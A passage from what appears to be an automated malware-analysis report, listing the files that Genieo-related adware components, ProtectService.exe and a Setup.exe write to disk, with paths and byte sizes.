C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\genieo_logo_small.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\x_gray_transparent.png (198 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\facebook_icon.png (432 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\blockTopic.png (137 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\genieo_slogan.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\js\notification.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\rss.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\shekerKolshehu.gif (52 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\shadowh.png (944 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\share_unfollow_old.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-showers-scattered.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\reportBugButton.png (777 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\button-enable.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\css\main.css (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\medium_image_frame.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_icon12px.png (543 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\ad_no_image.gif (594 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\notification_enabled_nav_prev.png (153 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\googleimg.gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\magazinePreview\background.png (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\settings\settings_ui.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\ie.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\pagelet_tip_yellow.png (206 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\headlines_frame.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_auth_start.png (440 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extChromeMac2.png (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack3.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\x.gif (828 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\message_tip.png (154 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-showers.png (959 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_9.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\signUpButton2.png (704 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\js\main.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\noPicture.png (976 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\double_border.png (133 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\field_en.properties (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\general.css (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\x_btn.png (309 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\css\aggregation_page.css (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\anabel_analytics.js (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\miniview_ui.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\birthday_no_birthdays_bg.png (883 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tryItNow.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\objectivehot_disabled_nav_prev.png (164 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\all-genieo-sp-list.txt (837 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_v.gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\js\notification-nodebug.js (159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\cakes.png (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\jquery.cookie.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\magazine_ribon.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\test_items.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\hp_guard.html (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_word.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\genieo_slogan_inner.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\.classpath (355 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\startpage.css (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm1frame2.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extFirefoxMac2.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\tpl\startpage.tpl (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\parent_proxy.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\js\utils.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\ticker.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\fail.png (658 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extSafariMacEnableExts.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\sethpButton2.png (997 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\js\aggregation_page.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extButton.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\fbButton.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\index.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\birthday\popup_bg.png (121 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\facebook_icon12px.png (592 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\settings\anabel_settings.js (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\box_collapse.png (154 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\blank.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\field_fr.properties (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\userpic_overlay.png (190 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\topicBg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\field_fr.json (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tmpl3rightButton.png (711 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\disabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\dfImg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\facebookShareIcon.png (311 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\btn.png (750 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\cmd_close.png (155 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\photos.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\const.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\notification_enabled_nav_next.png (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\pnf.gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\iPhoneOk.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\goRssButton.png (790 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\older_items_btn.png (249 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\settings\followbutton.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\topicDefault.png (478 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_icon.png (798 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\personalizationMeter\normalLevel.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\hide_notification.png (165 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\empty.gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\collage\template3.html (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\prowered_by_google.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_7.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\DebugUtils.js (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\personalizationMeter\close.png (143 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\footer_bg.gif (834 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\disconnectTwitterBtn.png (690 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\jquery-genieo-postmessage.js (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\birthday\popup_bg_white.png (121 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\previewShare.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_bird2.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extSafariWin2.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\birthday\you_tube.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\pagelet_tip_yellow_down.png (191 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack5sm.png (961 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\footer_right_logo.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\redHome.png (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\reopen_btn.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\activity-indicator.gif (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\waitingTr.gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\magazinePreview\defaultCover.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\rss.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\layers.css (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\birthday\share_btn.png (553 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\medium_video_frame.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\hover_bg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\personalizationMeter.css (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\fb_icon_big.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\sethpButton.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\follow.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\anabel_ui_pages.js (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\iphone.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\set_as_homepage_bg.png (993 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\fb.gif (97 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\default_favicon.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\tutorial.png (5520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\magazinePreview\strip.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\waiting.gif (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_2.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\settings.css (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\actions.png (588 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\menu_bg.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\translator.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\red_arror_down.png (143 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack4sm.png (961 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\img\warning.png (380 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\videobutton.png (862 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\x_white.png (222 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\feedbackButton.png (851 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\noItems.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\x_white.gif (53 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\genieo_slogan_inner_fr.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tmpl3leftButton.png (687 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\redarr.png (484 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\footer_sep.gif (52 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\img\dfImg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\forPictures.png (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\layers.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\js\notification-debug.js (534 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm1frame2sm.png (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\wt.png (331 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\arrow_down_disable.gif (821 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\open_splash.png (696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\poweredByGenieo.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\sendFeedbackButton2.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\shortcut.png (381 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-clear.png (682 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\item_controls_bg.png (167 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\connect_with_facebook.png (828 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\js\classes.js (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\easer.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\disabled_nav_prev2.gif (88 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\img\social_box.png (253 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\img\notification_controls.png (478 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\objectivehot_enabled_nav_next.png (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\tpl\main.tpl (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\underconstructions.jpg (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_10sm.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\loader.gif (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\personalizationMeter\redArrow.png (262 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\sad.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\img\play_icon.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\noPicture_.png (976 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\play_big.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\tools.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\trash.png (515 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\genieo_logo.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\template_factory.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_v.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\icons\thumb_down.png (703 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\miniview.css (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\mobile.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\Renderers.js (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\defaultPicture.png (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\template2sm.png (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\bigHotItemIcon.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\template1sm.jpg (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\template3.jpg (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\magazinePreview\coverShadow.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\bigHotItemIcon.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\prog_bar.gif (101 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twit_pic.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\x_gray.png (193 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\pink.gif (801 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\topicDefault.gif (565 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\birthday.html (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_x.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\footer_left.png (256 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\tpl\main.tpl (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\prototype.postmessage.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack2sm.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-few-clouds.png (763 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\pagelet_tip_white_down.png (191 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\personalizationMeter\lowLevel.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\settings\okCancelButton.png (734 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\dfImg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\dot_clear.gif (42 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\genieo_is_installed.js (37 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\bday_image.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\ie9.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\.settings\org.eclipse.core.resources.prefs (124 bytes)

The process ProtectService.exe:3188 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\ProgramData\IHProtectUpDate\update\conf (5 bytes)

The process Setup.exe:4008 makes changes in the file system.
The Application creates and/or writes to the following file(s):

%Program Files% (x86)\GPLGS\traceop.ps (2 bytes)
%Program Files% (x86)\GPLGS\fonts.dir (27 bytes)
%Program Files% (x86)\GPLGS\zeroline.ps (2 bytes)
%Program Files% (x86)\GPLGS\viewcmyk.ps (2 bytes)
%Program Files% (x86)\GPLGS\quit.ps (6 bytes)
%Program Files% (x86)\GPLGS\pv.sh (1 bytes)
%Program Files% (x86)\GPLGS\Fontmap.Ult (6 bytes)
%Program Files% (x86)\GPLGS\markhint.ps (3 bytes)
%Program Files% (x86)\GPLGS\gs_fonts.ps (45 bytes)
%Program Files% (x86)\GPLGS\z003034l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_il1_e.ps (2 bytes)
%Program Files% (x86)\GPLGS\n021004l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_diskf.ps (7 bytes)
%Program Files% (x86)\GPLGS\gs_wl2_e.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_wan_e.ps (1 bytes)
